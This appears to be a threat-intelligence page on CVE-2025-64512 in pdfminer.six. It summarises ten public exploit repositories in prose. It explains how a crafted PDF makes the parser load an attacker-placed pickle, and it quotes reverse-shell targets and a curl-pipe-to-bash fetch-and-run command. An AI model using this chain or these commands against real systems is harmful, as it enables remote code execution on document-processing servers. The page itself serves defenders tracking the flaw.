CVE-2025-64512 is an insecure deserialization vulnerability in pdfminer.six before version 20251107. The CMapDB._load_data() function uses Python pickle deserialization for CMap data. A crafted PDF can influence the directory and filename used to locate the serialized data, enabling an attacker-controlled compressed pickle payload to be deserialized automatically while the PDF is processed. Deserialization of the payload can execute arbitrary Python code in the security context of the process processing the PDF.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
10 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
The repository contains a README and one Python 3 standard-library exploit script, cve_2025_64512.py. It targets CVE-2025-64512, an unsafe pickle deserialization path in vulnerable pdfminer.six CMap loading. The exploit encodes an attacker-selected absolute pathname into a PDF Type0 font's /Encoding name using PDF hexadecimal name escapes. When pdfminer resolves that name, the absolute pathname escapes the intended CMap directory; it appends .pickle.gz, decompresses the attacker-placed file, and unpickles it. The generated pickle executes an operator-supplied command through eval and os.system. The script supports a two-upload workflow for extension-gated PDF processing and a one-file gzip/PDF polyglot workflow for applications that parse arbitrary uploaded files as PDFs. It provides multipart upload, optional placement verification, waiting for asynchronous processing, local artifact generation, and callback-oriented execution confirmation. Upload URLs, form fields, upload paths, commands, and callback values are operator-supplied rather than fixed in the code; the only concrete network values are documentation examples.
This repository is a small, self-contained Python proof-of-concept exploit for CVE-2025-64512 in pdfminer.six. It contains two executable scripts and a README explaining the exploit chain. The vulnerability is an unsafe deserialization issue in pdfminer.six CMap loading: a PDF-controlled font /Encoding value is transformed into a filename, .pickle.gz is appended, and the resulting file is opened and passed to pickle.loads(). Because absolute paths are accepted, the attacker can force pdfminer.six to load an arbitrary gzip-compressed pickle from a chosen filesystem location. Repository structure: README.md documents the bug, exploitation requirements, and usage; make_payload.py generates the malicious gzip-compressed pickle; make_trigger_pdf.py generates a minimal PDF with a Type0/CIDFont object whose /Encoding name encodes an absolute path to the payload file. The scripts are standalone and intended to be run locally by an operator to produce the two artifacts needed for exploitation. Exploit capability: make_payload.py creates a pickle object using a class with __reduce__ that evaluates a Python expression calling os.system() with an attacker-supplied command. It then returns a CMap-like dictionary so the vulnerable code path can continue without immediately breaking. This gives arbitrary command execution on the machine parsing the PDF. make_trigger_pdf.py constructs a valid minimal PDF 1.4 file, including object table and xref offsets, and encodes the absolute payload path by replacing '/' with '#2f' so it is preserved inside a PDF name token. The exploit is operational rather than a mere detector because it produces a working RCE payload and trigger document. Attack flow: the attacker prepares payload.pickle.gz and trigger.pdf, uploads or otherwise places both where the target application can access them, and waits for a vulnerable pdfminer.six workflow such as pdf2txt.py or a background PDF-processing watcher to parse the trigger PDF. When parsing reaches CMapDB._load_data(), the malicious pickle is decompressed and deserialized, executing the embedded command. The README also shows a blind exfiltration pattern using curl to an attacker-controlled HTTP listener. Notable endpoints and artifacts are mostly filesystem paths rather than fixed network infrastructure: default output files payload.pickle.gz and trigger.pdf, the example absolute target path /var/www/research.bedside.htb/uploads/payload, and the vulnerable search path /usr/share/pdfminer/. The only network indicators are example callback URLs embedded in sample commands, which are illustrative rather than hardcoded operational infrastructure.
Repository contains a minimal exploit for CVE-2025-64512 with two files: a short README and one Python script, cve_2025_64512.py. The script is a standalone operational exploit targeting a vulnerable web application on Hack The Box Bedside at http://research.bedside.htb/. It automates a two-stage attack: first it creates a gzip-compressed malicious pickle whose __reduce__ method invokes os.system to launch a bash reverse shell; second it generates a crafted PDF whose font Encoding/CMap reference is manipulated to point pdfminer.six at a server-side path corresponding to the uploaded pickle. The exploit uploads both files through the target's multipart file upload endpoint using form field 'uploadFile', then verifies their presence under /uploads/. The intended effect is that when the application processes the uploaded PDF with vulnerable pdfminer.six behavior, it deserializes the attacker-controlled pickle and executes the reverse shell command. The script hardcodes the target URL and server upload directory, accepts attacker LHOST/LPORT as arguments, saves both payload artifacts locally under /tmp for manual reuse, and prints operator instructions for catching the shell with netcat. Overall, this is a real exploit rather than a detector, focused on web-based file upload leading to server-side deserialization RCE.
Repository is a small standalone proof-of-concept exploit for CVE-2025-64512, described as an insecure deserialization RCE in pdfminer.six when parsing malicious PDFs. It contains 4 files: a README with usage instructions and three Python scripts. generate_pickle.py creates a gzip-compressed pickle object whose __reduce__ method evaluates Python code that runs os.system with a hardcoded bash reverse shell to 10.10.14.87:4444. method1_encoding_poc.py builds a handcrafted PDF using a malicious /Encoding value that embeds a path-like reference (/var/www/research.bedside.htb/uploads/malicious) intended to coerce vulnerable parsing behavior; despite the README claiming exploit.pdf output, the script actually writes heavy.pdf. method2_cmap_poc.py creates a second handcrafted PDF variant using /Encoding /CMap and writes exploit_cmap2.pdf; this appears to be the cleaner or preferred trigger path per the README. Overall purpose: generate a malicious serialized payload plus one of two PDF trigger files for delivery through file-upload workflows or any service that parses PDFs with vulnerable pdfminer.six. Main capability is remote code execution on the PDF-processing host, with the included payload opening a reverse shell. The repository is exploit code rather than a detector, and it is operational because it includes a working hardcoded payload rather than only a trigger primitive.
Small standalone Python PoC repository for CVE-2025-64512 targeting pdfminer.six deserialization via a malicious PDF and external gzip-compressed pickle. Repository structure is minimal: LICENSE, README.md with setup/usage guidance, and exploit.py containing the full exploit workflow. The script generates a crafted PDF whose font Encoding field embeds an encoded absolute filesystem path to a pickle, creates a malicious pickle object whose __reduce__ causes os.system() execution during deserialization, compresses it as evil.pickle.gz, uploads both files to a configured web upload endpoint, and then issues a GET request to BASE_URL + 'uploads/{saved_pdf}' to trigger downstream PDF processing. Main exploit capability is arbitrary command execution on the target; default payload is a Python reverse shell connecting back to operator-supplied LHOST:LPORT and spawning /bin/bash. The exploit assumes a vulnerable application accepts uploads, stores them in a known server-side directory, and later parses the uploaded PDF with vulnerable pdfminer.six. It is an operational PoC rather than a detection script, with configurable target endpoint and callback settings but a basic hardcoded reverse-shell payload path.
This repository is a small standalone Python proof-of-concept exploit for CVE-2025-64512 affecting pdfminer.six versions prior to 20251107. The repo contains only two files: a README describing the vulnerability and one executable Python script, exploit_cve-2025-64512.py, which is the main entry point. The exploit automates a two-stage attack chain. First, it creates a malicious Python pickle object whose __reduce__ method causes os.system(command) execution when deserialized. That pickle is gzip-compressed and saved as malicious.pickle.gz. Second, it generates a crafted PDF, trigger.pdf, whose font Encoding field is set to a specially encoded path pointing at the uploaded pickle payload in an assumed server-side upload directory. The script then uploads both files to a user-supplied HTTP upload endpoint using multipart/form-data with the field name uploadFile. Operationally, the exploit does not itself trigger PDF parsing directly; it relies on the target application or a background worker to later process the uploaded PDF using vulnerable pdfminer.six. After upload, the script waits 30 seconds, assuming asynchronous processing. Success is inferred only from the upload response containing the phrase 'uploaded successfully', so exploitation confirmation is indirect. Capabilities include arbitrary command execution via a custom --cmd argument and a built-in bash reverse shell mode using --lhost/--lport. The reverse shell payload uses /dev/tcp and therefore assumes a bash-capable Unix-like target with outbound connectivity to the attacker. The exploit also assumes knowledge of the server-side upload directory, defaulting to /var/www/html/uploads, though this can be overridden with --upload-dir. Overall, this is an operational PoC rather than a detection script: it weaponizes the claimed insecure deserialization issue into practical RCE by combining malicious file generation with automated upload to a web-accessible target.
This repository contains a single standalone Python proof-of-concept exploit, exploit.py, for pdfminer.six RCE identified as CVE-2025-64512 and referenced with advisory GHSA-wf5f-4jwr-ppcp. The script is not a scanner or detector; it is an exploit artifact generator. Its core capability is to create a malicious pickle payload that executes an arbitrary shell command through Python deserialization by defining a class whose __reduce__ method returns os.system with attacker-controlled arguments. The pickle is gzip-compressed and saved as evil.pickle.gz. The second capability is malicious PDF generation. The script builds a handcrafted PDF containing a font object whose /Encoding entry is replaced with a hex-escaped filesystem path derived from user input. That path is intended to cause a vulnerable pdfminer.six parser to load and deserialize the external pickle file. The helper function recalculate_xref rebuilds PDF xref offsets so the generated document remains structurally valid after path substitution. Repository structure is minimal: one Python file with a CLI entry point. main() accepts --command, --path, and --output-dir. --command is the OS command to run on the victim, --path is the filesystem path embedded into the PDF (without the .pickle.gz suffix per the script help text), and --output-dir controls where the local exploit artifacts are written. The exploit does not itself deliver the PDF, host payloads, or contact a target over the network; any network activity would come only from the attacker-supplied command, such as the example curl http://[ip]:[port]/shell.sh|bash. Overall, this is an operational local/file-based exploit generator for achieving arbitrary command execution in a vulnerable pdfminer.six processing environment.
This repository is a small standalone Python exploit generator for CVE-2025-64512, an insecure deserialization issue in pdfminer.six CMap loading. The repo contains only two files: a detailed README and one executable script, gen_payload.py. The script is the sole entry point and uses only Python standard library modules (argparse, pickle, gzip). Core capability: it generates a pair of artifacts required for exploitation: (1) a crafted trigger PDF whose font /Encoding field points to an attacker-chosen filesystem path with '/' encoded as '#2F', and (2) a gzip-compressed malicious pickle payload. The pickle defines a class RCE whose __reduce__ method returns os.system with an attacker-controlled command, so when vulnerable pdfminer.six resolves and unpickles the referenced CMap cache file, arbitrary command execution occurs. Exploit flow implemented by the code: the operator supplies --path for the target-side payload location and --command for the OS command to run. The script substitutes the encoded path into a hardcoded PDF template and serializes the malicious object with pickle.dumps(), then writes the PDF and compressed pickle to disk. The exploit itself does not deliver files or trigger remote processing; it prepares artifacts for later upload or placement. Therefore this is an operational PoC rather than a full weaponized exploit framework. Targeting is clearly documented: vulnerable pdfminer.six <= 20250506, with downstream exposure also noted for markitdown <= 0.1.3 and pdfplumber <= 0.11.7. Successful exploitation requires a document-processing workflow that parses attacker-controlled PDFs and stores attacker-controlled files at predictable paths accessible to the vulnerable process. No hardcoded victim network infrastructure is present. Network activity appears only in README examples showing optional post-exploitation commands such as curl callbacks or bash reverse shells. The main fingerprintable artifacts are local filesystem paths embedded into the PDF and the generated filenames trigger.pdf and payload.pickle.gz.
This repository is a compact proof-of-concept exploit for CVE-2025-64512, an arbitrary code execution issue in pdfminer.six triggered by crafted PDF input that causes unsafe pickle deserialization. The repo contains two Python scripts and two supporting artifacts: README.txt with usage instructions, ex-poc.pdf as a sample malicious PDF, mkpdf.py to generate crafted PDFs, and mkpickle.py to generate gzip-compressed malicious pickle payloads. mkpickle.py is the execution payload generator. It accepts an arbitrary shell command and serializes a Python object whose __reduce__ method resolves to os.system(cmd). The serialized object is then gzip-compressed into a .pickle.gz file, defaulting to evil.pickle.gz. This gives the exploit direct arbitrary command execution capability on the vulnerable host once deserialization occurs. mkpdf.py is the delivery generator. It creates a minimal PDF whose Font Encoding field embeds a filesystem path encoded with #2F path separators. The intended effect is to make vulnerable pdfminer.six resolve and load a .pickle.gz file from a local path on the target system. The script supports three modes: a custom absolute path (-p), a fuzzing mode (-f) that emits multiple PDFs for common deployment directories, and a default relative-path mode. The fuzz list includes likely web/app storage locations such as /var/www/html/files, /opt/app/files, /app/files, /tmp, and /var/tmp. The included ex-poc.pdf demonstrates the structure of the malicious PDF and embeds /var/www/html/files/evil as the target path, implying the vulnerable parser will append or otherwise resolve to evil.pickle.gz. The README describes a realistic exploitation flow: generate a malicious pickle containing a command such as 'touch /tmp/a', upload it to a predictable server-side directory, generate a PDF pointing to that path, then upload the PDF and wait for backend PDF processing to trigger code execution. Overall, this is a real exploit repository rather than a detector. It is operational but simple: it provides a hardcoded arbitrary-command payload mechanism and a PDF generator to target vulnerable pdfminer.six processing pipelines, especially web applications that ingest PDFs and store attacker-controlled files in predictable filesystem locations.
This repository provides a proof-of-concept exploit for CVE-2025-64512, a critical vulnerability in pdfminer.six (20250506), markitdown (0.1.3), and pdfplumber (0.11.7) on Linux-like systems. The exploit leverages unsafe deserialization via pickle in conjunction with PDF parsing, allowing arbitrary command execution. The main exploit script (CVE-2025-64512.py) generates a polyglot file that is both a valid GZIP-compressed pickle (containing a malicious object) and a valid PDF. This file can be supplied to the vulnerable software (e.g., via pdf2txt.py or markitdown) to trigger code execution. The Dockerfile automates the setup of a vulnerable environment and demonstrates payload generation for both pdfminer.six and markitdown. The README provides detailed background, exploitation steps, and lists affected products and versions. No network endpoints are involved; exploitation is local, requiring the attacker to supply a crafted file to the target system. The exploit is a functional proof-of-concept and demonstrates the risk of deserializing untrusted data in common Python PDF processing libraries.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.